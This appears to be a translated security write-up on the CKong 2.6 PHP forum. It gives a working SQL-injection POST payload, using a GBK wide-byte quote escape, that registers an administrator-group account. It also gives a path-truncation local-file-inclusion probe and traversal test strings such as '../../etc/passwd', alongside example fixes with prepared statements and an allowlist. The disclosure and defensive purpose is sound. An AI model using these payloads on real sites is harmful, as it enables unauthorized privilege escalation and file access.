The problem is in profile.php. The registration handler takes $reguser, $regemail, $reghomepage, $regarea, $regcomm and $regsex from the request: $reguser and $regemail are only checked against a format pattern, and the other four are concatenated into the INSERT statement with no filtering at all, so a registering user can break out of a quoted value, set their own group_id and obtain administrator privilege.
The code is as follows (reference clip):
if ($action == 'reg' && $reguser) {
    // captcha check
    if ($Global['hashto']['reg'] && (!$hashnum || $hashnum <> $_SESSION[$Global['privprefix'].'imghash'])) $C_errormsg .= '<li>Verification code error</li>';
    // user name: 3-12 GBK characters, letters or digits (quantifier reconstructed from the error message)
    if (!preg_match("/^([\x81-\xfea-z0-9]){3,12}$/i", $reguser)) $C_errormsg .= '<li>The user name must be 3-12 Chinese characters, letters or digits</li>';
    // e-mail format check (eregi was removed in PHP 7; kept as in the original)
    if (!eregi("^[_\.0-9a-z-]+@([0-9a-z][0-9a-z-]+\.)+[a-z]{2,3}$", $regemail)) $C_errormsg .= '<li>Email filled in incorrectly</li>';
    $SQL = 'select user_id from '.__TAB_USER__." where ".$Global['mysql_userow']."='".$reguser."'";
    $result = $db->query($SQL);
    if ($rows = $db->fetch_row($result)) $C_errormsg .= '<li>The user name already exists</li>';
    $SQL = 'select ban_id from '.__TAB_BANLIST__." where ban_name='".$reguser."'";
    $result = $db->query($SQL);
    if ($rows = $db->fetch_row($result)) $C_errormsg .= '<li>This user name has been disabled</li>';
    $db->free_result($result);
    if (!$C_errormsg) {
        // $reghomepage, $regarea, $regcomm and $regsex go straight into the statement; only the
        // integer fields are cast, and group_id is fixed to 2 at the end of the statement
        $SQL = 'insert '.__TAB_USER__." set ".$Global['mysql_userow']."='$reguser',".$Global['mysql_pwdrow']."='".md5($regpwd)."', user_email='$regemail', user_qq='".intval($regqq)."', user_regdate='".$Global['f_time']."', user_homepage='$reghomepage', user_area='$regarea', user_comm='$regcomm', user_sex='$regsex', user_publicemail='".intval($publicmail)."', group_id=2";
        die("\r\n".$SQL);   // debug line in the writeup's clip: prints the assembled statement and stops
        if (!($result = $db->query($SQL))) back('register data insertion failed');
Capture the registration request manually and submit the following POST body directly:
http://www.bkjia.com/phptest/Ckong2/CKong2.6/profile.php
reguser=seraph3&regpwd=seraph&regpwd2=seraph&regemail=seraphsdflk2@dfc.om&publicmail=1&regsex=1%d5', user_publicemail%3d1, group_id%3D7 #&regqq=343434&reghomepage=1212121&regarea=121212&regcomm=%CE%D2%CA%B2%C3%B4%D2%B2%B2%BB
The regsex value closes the user_sex literal, appends its own assignments, and the trailing # turns the rest of the statement (including the hard-coded group_id=2) into a MySQL comment, so the row is inserted with group_id=7. The %d5 byte in front of the quote is the GBK wide-byte trick: if magic_quotes_gpc turns the quote into \', the bytes D5 5C are read as one GBK character on a GBK connection and the quote is left unescaped.
Repair method (the replacement string did not survive the translation of this copy; the intent is to replace the ASCII single quote with a character that cannot terminate the SQL literal, and the full-width quote is used here as a stand-in):
$reghomepage = str_replace("'", "’", $reghomepage);
$regarea = str_replace("'", "’", $regarea);
$regcomm = str_replace("'", "’", $regcomm);
$regsex = str_replace("'", "’", $regsex);
I still don't trust magic_quotes_gpc much. Filtering the values yourself is more reliable.
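To make the PoC above and the repair concrete, here is an added example (not CKong's own code) that rebuilds the registration INSERT the way profile.php does, shows what the posted regsex value turns it into, and then does the same insert with bound parameters so the value can never reach the statement text. The table name ck_user, the column names user_name and user_pwd (the page only shows them as $Global['mysql_userow'] and $Global['mysql_pwdrow']), and the DSN, user and password read from the environment are assumptions; group 7 is simply the group the PoC asks for, the page does not name it.

```php
<?php
// Added example, not from the CKong source. Assumed names: table ck_user, columns
// user_name/user_pwd; DSN/DBUSER/DBPASS environment variables for the MySQL part.

// 1. The vulnerable shape: every request value is pasted into the statement text.
function build_register_sql_vulnerable(array $p): string
{
    return "insert ck_user set user_name='{$p['reguser']}', user_pwd='" . md5($p['regpwd'])
        . "', user_email='{$p['regemail']}', user_qq='" . intval($p['regqq'])
        . "', user_homepage='{$p['reghomepage']}', user_area='{$p['regarea']}'"
        . ", user_comm='{$p['regcomm']}', user_sex='{$p['regsex']}'"
        . ", user_publicemail='" . intval($p['publicmail']) . "', group_id=2";
}

// The POST body from the writeup, URL-decoded (constructed here from the page's PoC).
$poc = [
    'reguser'     => 'seraph3',
    'regpwd'      => 'seraph',
    'regemail'    => 'seraphsdflk2@dfc.om',
    'publicmail'  => '1',
    'regsex'      => "1\xd5', user_publicemail=1, group_id=7 #",
    'regqq'       => '343434',
    'reghomepage' => '1212121',
    'regarea'     => '121212',
    'regcomm'     => 'x',
];

// Everything after the # is a MySQL comment, so the hard-coded group_id=2 is gone
// and the row is created with group_id=7.
echo build_register_sql_vulnerable($poc), "\n";

// What magic_quotes_gpc / addslashes() would have sent: bytes 31 d5 5c 27. On a GBK
// connection MySQL reads d5 5c as one character, and the quote (27) is still live.
echo bin2hex(substr(addslashes($poc['regsex']), 0, 4)), "\n";

// 2. The fix: bind every value; integers are cast; group_id is never user-controlled.
function register_user(PDO $db, array $p): void
{
    $sql = 'insert ck_user set user_name=:user, user_pwd=:pwd, user_email=:email, user_qq=:qq,'
         . ' user_homepage=:home, user_area=:area, user_comm=:comm, user_sex=:sex,'
         . ' user_publicemail=:pub, group_id=2';
    $st = $db->prepare($sql);
    $st->execute([
        ':user'  => $p['reguser'],
        ':pwd'   => md5($p['regpwd']),      // kept from the original; unsalted md5 is weak
        ':email' => $p['regemail'],
        ':qq'    => (int) $p['regqq'],
        ':home'  => $p['reghomepage'],
        ':area'  => $p['regarea'],
        ':comm'  => $p['regcomm'],
        ':sex'   => (int) $p['regsex'],     // the column only ever holds a small integer
        ':pub'   => (int) $p['publicmail'],
    ]);
}

// Runs only when a MySQL DSN is supplied, e.g.
//   DSN='mysql:host=127.0.0.1;dbname=ckong;charset=utf8mb4' php this.php
if ($dsn = getenv('DSN')) {
    $db = new PDO($dsn, getenv('DBUSER') ?: 'root', getenv('DBPASS') ?: '', [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false,  // server-side prepares, no client-side quoting
    ]);
    register_user($db, $poc);
    // user_sex is stored as 1 and group_id stays 2; the payload never becomes SQL text.
}
```

Two details matter beyond the binding itself: the charset is declared in the DSN so client and server agree on the encoding (the wide-byte trick needs a mismatch), and emulated prepares are switched off so the driver does not fall back to building the statement text itself.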
-----------------------------------------------------------
This program also has a local file inclusion vulnerability in admin.php, reachable after logging in. The following test script (reference clip) probes it by measuring how many trailing dots are needed before an appended ".php" suffix is cut off the path, which is what lets a user-chosen file such as create.txt be included:
<?php
ini_set('max_execution_time', 0);
$str = '';
for ($i = 0; $i < 1000; $i++) {
    $str = $str . '.';
    $pfile = 'create.txt';
    // once the trailing dots push the path past the length limit, the '.php' suffix is
    // truncated, create.txt is included and $i shows how many dots were needed
    if (include_once($pfile . $str . '.php')) echo $i;
}
?>
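The probe above only works because the script lets the request choose the file and fixes nothing but the extension. As an added example (not the CKong admin.php, whose parameter name the page does not give), here is that include pattern next to an allowlisted version; the page table, the base directory and the temporary files it creates for its own self-test are all assumptions made for the demonstration.

```php
<?php
// Added example, not from CKong. Assumed: the request supplies a page key; the allowed
// pages and the base directory are made up for this demonstration.

// Vulnerable shape: the caller controls the path and only the extension is appended.
// On PHP versions where an over-long path is cut off (or where a %00 ends the string),
// "create.txt" followed by enough dots loses the ".php" and create.txt is included.
function include_page_vulnerable(string $page): void
{
    include_once $page . '.php';
}

// Allowlist: the request selects a key, never a path.
const ADMIN_PAGES = [
    'overview' => 'overview.php',
    'users'    => 'users.php',
];

function resolve_admin_page(string $page, string $base): ?string
{
    if (!isset(ADMIN_PAGES[$page])) {
        return null;                          // unknown key: nothing is included
    }
    $baseReal = realpath($base);
    $path     = realpath($base . DIRECTORY_SEPARATOR . ADMIN_PAGES[$page]);
    // realpath() canonicalises "..", symlinks and trailing dots, so the prefix check is
    // done on the real location; keep it even with an allowlist as defence in depth.
    if ($baseReal === false || $path === false
        || strncmp($path, $baseReal . DIRECTORY_SEPARATOR, strlen($baseReal) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Self-test against a throw-away directory so the script runs anywhere.
$base = sys_get_temp_dir() . '/lfi-demo-' . getmypid();
mkdir($base);
file_put_contents("$base/overview.php", "<?php echo 'overview page';\n");
file_put_contents("$base/create.txt",   "<?php echo 'attacker-controlled text';\n");

$tries = [
    'overview',                               // allowed key
    'create.txt' . str_repeat('.', 4096),     // the probe's truncation attempt
    '../../etc/passwd',                       // classic traversal
    "create.txt\0",                           // null byte (modern PHP rejects it anyway)
];
foreach ($tries as $t) {
    $r = resolve_admin_page($t, $base);
    printf("%-30s -> %s\n", substr(addcslashes($t, "\0"), 0, 30),
        $r === null ? 'rejected' : 'include ' . basename($r));
}

unlink("$base/overview.php");
unlink("$base/create.txt");
rmdir($base);
```

Only the first key resolves; the truncation string, the traversal and the null-byte variant are rejected before any filesystem call, so the script never depends on which PHP version's path handling happens to be in use.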
Discussion of these issues is welcome.
This program is small and probably not widely used; treat this purely as a technical exercise.